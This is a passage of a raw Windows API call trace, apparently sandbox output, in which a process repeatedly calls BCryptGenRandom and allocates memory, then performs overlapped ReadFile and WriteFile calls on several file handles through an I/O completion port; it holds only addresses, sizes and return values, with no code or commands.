[0148.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.141] CloseHandle (hObject=0x3cc) returned 1 [0148.141] free (_Block=0x3df0008) [0148.141] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0148.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0148.150] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0148.150] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0148.150] free (_Block=0x3e305b8) [0148.150] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0148.150] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0148.151] free (_Block=0x1fa91d0) [0148.151] free (_Block=0x1fa2ed8) [0148.151] free (_Block=0x1fa90b8) [0148.151] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.151] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.152] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4500, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.153] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.180] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4724, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.181] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.193] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x19c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.194] CloseHandle (hObject=0x3cc) returned 1 [0148.194] free (_Block=0x3df0008) [0148.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.204] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0148.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0148.205] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0148.205] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0148.205] free (_Block=0x3e305b8) [0148.205] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0148.205] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0148.206] free (_Block=0x1fa91d0) [0148.206] free (_Block=0x1fa2ed8) [0148.206] free (_Block=0x1fa90b8) [0148.206] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.207] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.216] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2d7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.227] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2870, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.228] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.238] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1d4c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.239] CloseHandle (hObject=0x3cc) returned 1 [0148.239] free (_Block=0x3df0008) [0148.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.246] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0148.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0148.247] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0148.248] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0148.248] free (_Block=0x3e305b8) [0148.248] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0148.248] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0148.248] free (_Block=0x1fa91d0) [0148.248] free (_Block=0x1fa2ed8) [0148.248] free (_Block=0x1fa90b8) [0148.248] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.250] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.250] CloseHandle (hObject=0x3cc) returned 1 [0148.251] free (_Block=0x3df0008) [0148.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.258] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0148.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0148.259] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0148.259] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0148.259] free (_Block=0x3e305b8) [0148.259] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0148.259] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0148.260] free (_Block=0x1fa91d0) [0148.260] free (_Block=0x1fa2ed8) [0148.260] free (_Block=0x1fa90b8) [0148.260] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0148.261] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0148.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.094] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3fe2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0149.095] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.096] CloseHandle (hObject=0x3cc) returned 1 [0149.096] free (_Block=0x3df0008) [0149.096] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0149.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0149.206] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.206] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.206] free (_Block=0x3e305b8) [0149.206] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.206] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.206] free (_Block=0x1fa91d0) [0149.206] free (_Block=0x1fa2ed8) [0149.206] free (_Block=0x1fa90b8) [0149.206] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0149.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.208] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0149.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.251] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1bcc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0149.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.278] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x221c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0149.287] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.302] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0149.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.329] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x23a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0149.329] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.339] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0149.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.340] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1260, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0149.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.433] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x834, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0149.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.433] CloseHandle (hObject=0x2a8) returned 1 [0149.433] free (_Block=0x3e70008) [0149.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.575] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.576] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0149.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.581] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0149.581] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.581] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.581] free (_Block=0x3e305b8) [0149.581] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.581] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0149.581] free (_Block=0x1fa91d0) [0149.581] free (_Block=0x77d7a8) [0149.581] free (_Block=0x1fa90b8) [0149.581] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0149.582] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.590] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x15f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0149.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.620] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0149.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0149.621] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.621] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.621] free (_Block=0x3e305b8) [0149.621] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.621] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.622] free (_Block=0x1fa91d0) [0149.622] free (_Block=0x1fa2ed8) [0149.622] free (_Block=0x1fa90b8) [0149.622] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0149.622] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.974] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0149.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0149.989] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3004, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.014] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3b5c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.026] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0150.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0150.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.033] GetProcAddress (hModule=0x753f0000, 